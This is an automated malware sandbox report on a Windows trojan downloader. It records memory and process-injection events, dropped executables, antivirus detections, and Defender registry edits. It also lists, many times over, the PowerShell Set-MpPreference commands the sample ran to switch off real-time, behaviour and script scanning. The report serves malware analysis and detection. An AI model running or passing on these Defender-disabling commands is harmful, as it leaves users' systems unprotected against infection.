NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef23d4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92cdc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c4b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c4d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92d91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92da0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92da1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92da2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 22, 2021, 10:19 a.m.	process_identifier: 6692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92da3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (4 events)

file	C:\Windows\System.exe
file	C:\Windows\Disable.vbs
file	C:\temp\finalres.bat
file	C:\Windows\Machos1.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (22 events)

cmdline	powershell Set-MpPreference -ModerateThreatDefaultAction 6
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
cmdline	powershell Set-MpPreference -SubmitSamplesConsent 2
cmdline	powershell Set-MpPreference -DisableBehaviorMonitoring $true
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
cmdline	powershell Set-MpPreference -DisableRealtimeMonitoring $true
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
cmdline	powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
cmdline	powershell Set-MpPreference -DisableBlockAtFirstSeen $true
cmdline	powershell Set-MpPreference -LowThreatDefaultAction 6
cmdline	powershell Set-MpPreference -DisableScriptScanning $true
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
cmdline	powershell Set-MpPreference -SevereThreatDefaultAction 6
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
cmdline	powershell Set-MpPreference -DisableIOAVProtection $true
cmdline	powershell Set-MpPreference -MAPSReporting 0
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

Drops a binary and executes it (2 events)

file	C:\Windows\Disable.vbs
file	C:\Windows\Machos1.exe

A process created a hidden window (14 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: C:\Windows/Disable.vbs parameters: filepath: C:\Windows\Disable.vbs	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: C:\Windows/Machos1.exe parameters: filepath: C:\Windows\Machos1.exe	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: C:\Windows/System.exe parameters: filepath: C:\Windows\System.exe		0
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -DisableRealtimeMonitoring $true filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -DisableBehaviorMonitoring $true filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -DisableBlockAtFirstSeen $true filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -DisableIOAVProtection $true filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -DisableScriptScanning $true filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -SubmitSamplesConsent 2 filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -MAPSReporting 0 filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -HighThreatDefaultAction 6 -Force filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -ModerateThreatDefaultAction 6 filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -LowThreatDefaultAction 6 filepath: powershell	1	1
ShellExecuteExW March 22, 2021, 10:19 a.m.	show_type: 0 filepath_r: powershell parameters: Set-MpPreference -SevereThreatDefaultAction 6 filepath: powershell	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 22, 2021, 10:19 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (11 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 22, 2021, 10:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (12 events)

description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_private_profile
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

One or more non-whitelisted processes were created (24 events)

parent_process	wscript.exe	martian_process	C:\Windows\SysWOW64\wscript.exe "C:\Windows\Disable.vbs" /elevate
parent_process	wscript.exe	martian_process	"C:\Windows\SysWOW64\WScript.exe" "C:\Windows\Disable.vbs" /elevate
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -ModerateThreatDefaultAction 6
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -SubmitSamplesConsent 2
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -DisableBehaviorMonitoring $true
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -DisableRealtimeMonitoring $true
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -DisableBlockAtFirstSeen $true
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -LowThreatDefaultAction 6
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -DisableScriptScanning $true
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -SevereThreatDefaultAction 6
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -DisableIOAVProtection $true
parent_process	wscript.exe	martian_process	powershell Set-MpPreference -MAPSReporting 0
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 8088 resumed a thread in remote process 3700
NtResumeThread March 22, 2021, 10:19 a.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 3700	1	0	0

Creates and runs a batch file to remove the original binary (1 event)

file	85f1898ca67d99c1_finalres.bat

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

MicroWorld-eScan	Trojan.GenericKD.36553863
McAfee	Artemis!897AABD3AC16
Cylance	Unsafe
Alibaba	TrojanDownloader:Win32/ATRAPS.b39c39f8
BitDefenderTheta	Gen:NN.ZelphiF.34628.@Z0@aGIITDli
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Trojan-Downloader.Win32.Generic
BitDefender	Trojan.GenericKD.36553863
Avast	Win32:Malware-gen
Rising	Downloader.Generic!8.141 (CLOUD)
Ad-Aware	Trojan.GenericKD.36553863
Emsisoft	Trojan.GenericKD.36553863 (B)
DrWeb	Trojan.DownLoader38.3828
McAfee-GW-Edition	BehavesLike.Win32.Generic.rm
FireEye	Generic.mg.897aabd3ac16050d
SentinelOne	Static AI - Suspicious PE
GData	Trojan.GenericKD.36553863
Avira	TR/ATRAPS.Gen
AegisLab	Trojan.Win32.Generic.a!c
Microsoft	Trojan:Win32/Wacatac.B!ml
Cynet	Malicious (score: 85)
MAX	malware (ai score=84)
VBA32	Trojan.Wacatac
Ikarus	Trojan.Agent
Fortinet	W32/Generic!tr.dldr
AVG	Win32:Malware-gen
Qihoo-360	Win32/TrojanDownloader.Generic.HwUBDDcA

Disables Windows Security features (4 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Bypass.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All